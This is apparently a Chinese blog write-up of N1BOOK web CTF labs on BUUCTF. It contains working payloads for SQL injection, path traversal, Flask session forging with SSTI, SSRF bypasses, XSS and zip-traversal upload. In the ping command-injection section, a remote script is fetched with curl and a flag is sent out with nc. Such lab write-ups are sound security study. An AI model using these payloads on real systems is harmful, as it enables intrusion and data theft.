N1BOOK
本文最后更新于 79 天前,其中的信息可能已经有所发展或是发生改变。

靶机都在BUUCTF上。

【第一章 web入门】

举足轻重的信息收集

常见的收集

手工只找到了robots.txt,剩下两个是敏感泄露文件。

  • robots.txt
  • index.php~
  • .index.php.swp

粗心的小李

scrabble

CTF中的SQL注入

SQL注入-1

id=3提示加入参数tips=1,输出查询语句:

select * from notes where id ='3'

测试了一下,完全没有WAF,应该是联合查询,尝试联合查询:

id=-1%27union%20select%201,2,3%23&tips=1

注意这里只能用%23,不能用#,否则无法正常值注入,因为在提交的时候,#并没有通过url编码进行转义。

看到回显是23,接下来注入就比较简单了。

-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_SCHEMA)%20from%20information_schema.tables),3%23

查表:

-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_NAME)%20from%20information_schema.tables%20where%20table_schema%3d'note'),3%23

读字段:

-1%27%20union%20select%201,(select%20group_concat(distinct%20COLUMN_NAME)%20from%20information_schema.columns%20where%20table_schema%3d'note'%20and%20table_name%3d'fl4g'),3%23

读字段内容:

-1%27%20union%20select%201,(select%20*%20from%20note.fl4g),3%23

SQL注入-2

脚本:

import requests

url = "http://ef016835-6405-4397-b459-3b902127f1ed.node3.buuoj.cn/login.php?tips=1"

# p = 'SELECT database()'
# p = "SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('note')"
# p = "SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('fl4g')"
p = "SELECT(flag)FROM(note.fl4g)"

admin = "admin' and updatexml(1,concat(0x7e,({}),0x7e),1);#".format(p)

payload = {'name': admin, 'pass': '1'}
files = []
headers = {}

response = requests.request("POST", url, headers=headers, data=payload, files=files)

print(response.text)

后续更新:这部分的正解应该是时间盲注。

任意文件读取漏洞

afr_1

本来以为是关键词过滤,后来才发现是文件有die函数,直接用filter文件流读取。

?p=php://filter/read=convert.base64-encode/resource=flag

afr_2

nginx 文件配置错误,访问/img../穿越目录获得flag。

(一直尝试在/..穿越目录)

afr_3

尝试插入..报错

[Errno 2] No such file or directory: '/home/nu11111111l/articles/article../'

穿越目录

/article?name=../../../etc/passwd

这里用到了Linux下的proc文件系统,即/proc,每个进程以数字命名,其中environ文件存储环境变量。

读文件:

/article?name=../../../proc/1/environ

这里的flag尝试提交失败,猜测应该不是这样做的,但是也没有找到思路,就去看了一下wp,感觉思路完全没对。

wp是查看/proc/self/cmdline:

/proc/$pid/ 可以获取指定进程的信息,但是如果某个进程想获取到自身的信息且不知道$pid时,可以通过访问/proc/self来查看文件,此时等价于/proc/$pid。

/article?name=../../../proc/self/cmdline

得到回显;

python server.py

查看server.py:

/article?name=../../../proc/self/cwd/server.py

可以看见是flask模板,且调用了flag.py以及key.py。

server.py:

import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')

FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    if page.find('flag')>=0:
        page = 'notallowed.txt'
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e

    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

其中这server.py部分代码存在SSTI cookie 注入。

if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None

读取flag.py时发现提示没有权限,有两种可能:过滤关键词或者是没有权限。测试了一下其他包含flag关键词的字段发现都没有权限,应该是存在关键词过滤(后来发现傻逼了,源码给了)。

key.py:

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

查看 Cookie Session:

Flask Session Cookie Decoder/Encoder 解密

于是使用payload,尝试读取flag.py:

python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40]('/flag.py').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'

报了语法错误的报错,于是尝试转义:

python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40](\'flag.py\').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'
eyJuMWNvZGUiOiJ7e1tdLl9fY2xhc3NfXy5fX21yb19fWzFdLl9fc3ViY2xhc3Nlc19fKClbNDBdKCdmbGFnLnB5JykucmVhZCgpfX0ifQ.X9D_Zw.w_83uqm3Mo7WIsTlt7QFPqtmffA

[第二章 web进阶]

SSRF 漏洞

SSRF Training

<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

正则匹配:

$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);

写一个脚本测试:

<?php
$url = 'http://a:127.0.0.1:80@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);

回显:

Array
(
    [scheme] => http
    [host] => hostname
    [user] => a
    [pass] => 127.0.0.1:80
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)
/path

check检测到的值为[‘host’]:www.baidu.com,而curl抓到的值为127.0.0.1,从而进行绕过。

http://a:@127.0.0.1:80@www.baidu.com/flag.php

命令执行漏洞

死亡ping命令

ping命令执行,但是没有回显。

存在WAF过滤字符,通过%0a绕过过滤并拼接命令,由于没有回显,只能考虑外带。

wp中使用了curl外带的方式。

编辑1.sh

ls
cat /FLAG | nc xx.xx.xxx.xx 8089

执行Ping命令

ip=127.0.0.1%0acurl+xx.xx.xxx.xx/1.sh+>+/tmp/1.sh

给bash添加权限

127.0.0.1%0achmod+777+/tmp/1.sh

监听

nc -lnvp 8089

执行bash文件

127.0.0.1%0ash+/tmp/1.sh

XSS的魔力

XSS闯关

payload1:

?username=<script>alert(1);</script>

payload2:

XSS语句已经在script中,直接闭合后alert

?username=xss%27;alert(1);//

payload3:

DOMXSS,插入img

?username=xss<img%20onerror=alert(1)%20src=1>

payload4:

js跳转,使用javascript伪协议

?jumpUrl=javascript:alert()

payload5:

表单自动提交,action可控,提交到伪协议。

?action=javascript:alert()&autosubmit=1

payload6:

angular二次渲染导致XSS:

?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

WEB文件上传漏洞

文件上传

这题还是让我学到了不少技巧的。

<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
require_once('pclzip.lib.php');

if(!$_FILES){

        echo '

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>文件上传章节练习题</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <style type="text/css">
        .login-box{
            margin-top: 100px;
            height: 500px;
            border: 1px solid #000;
        }
        body{
            background: white;
        }
        .btn1{
            width: 200px;
        }
        .d1{
            display: block;
            height: 400px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box col-md-12">
        <form class="form-horizontal" method="post" enctype="multipart/form-data" >
            <h1>文件上传章节练习题</h1>
            <hr />
            <div class="form-group">
                <label class="col-sm-2 control-label">选择文件:</label>
                <div class="input-group col-sm-10">
                    <div >
                    <label for="">
                        <input type="file" name="file" />
                    </label>
                    </div>
                </div>
            </div>
                
        <div class="col-sm-8  text-right">
            <input type="submit" class="btn btn-success text-right btn1" />
        </div>
        </form>
        </div>
    </div>
</body>
</html>
';

    show_source(__FILE__);
}else{
    $file = $_FILES['file'];

    if(!$file){
        exit("请勿上传空文件");
    }
    $name = $file['name'];

    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;

    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            
            }
        }
    }

    if(!is_dir($dir)){
        mkdir($dir);
    }

    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }

    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

            check_dir($dir);
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }
}

代码比较长,重新排版审计一下,留下关键WAF函数

<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
require_once('pclzip.lib.php');


    $file = $_FILES['file'];
    // 空文件上传检测
    if(!$file){
        exit("请勿上传空文件");
    }
    $name = $file['name'];

    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;

    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            
            }
        }
    }

    if(!is_dir($dir)){
        mkdir($dir);
    }

    $temp_dir = $dir.md5(time(). rand(1000,9999)); // 解压到随机生成的目录,不能使用条件竞争
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }

    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){ // 白名单验证后缀
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){ //过滤zip文件中的php文件,但是有$,可以用其他后缀绕过
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) { // 解压zip中文件
                check_dir($dir);
                   exit("解压失败");
            }

            check_dir($dir); // 再次检测文件
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir); 
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }

简单概括一下WAF,首先是有一个白名单后缀检测,只允许上传图片以及压缩包;且如果压缩包的后缀以php结尾,就会解压失败并报错。解压结束后,再次调用检查函数对该压缩包解压出的文件进行删除。考虑这里可能会存在条件竞争。

接着往下分析,解压目录在一个随机生成的文件夹下,所以没有办法进行条件竞争,无法获取到文件夹的名字。

这里用到的第一个漏洞就是Apache多后缀文件解析漏洞,这个漏洞已经烂大街了就不解释了,版本号在1.x到2.x之间,刚好符合。

由于解压后会再次调用检查函数在随机生成的文件夹下进行扫描,看似无解,但是可以利用目录穿越的骚姿势绕过。压缩后,使用010 Editor修改文件名。

穿越目录上传后访问根目录下文件即可获得flag。

[第三章]Web进阶

反序列化漏洞

tp5.1.x的反序列化漏洞。

Python中的安全问题

Python里的SSRF

发现127.0.0.1被禁用,给了提示

尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag

官方wp给了多种解法

  • 0.0.0.0:8000 绕过

127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。

  • [::1]:8000 绕过(需要支持 ipv6)
  • 重定向跳转到 127.0.0.1:8000
  • dns rebinding 输入一个域名,第一次解析到非 127.0.0.1 地址上,第二个解析到 127.0.0.1 上。

SSTI

没有WAF,fuzz一下popen函数

import requests

for i in range(512):
    password = f"%22%22.__class__.__bases__[0].__subclasses__()[{i}].__init__.__globals__"
    url = f"http://1de70960-ff51-4887-b604-2f07b94f49bc.node3.buuoj.cn/?password=" + "{{" + password + "}}"
    print(url)

    payload = {}
    files = []
    headers = {}

    response = requests.request("GET", url, headers=headers, data=payload, files=files)

    if response.text.find('popen') != -1:
        print(i)
        exit(1)

fuzz到127,直接读就行。

?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__[%27popen%27](%27cat%20/app/server.py%27).read()}}

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇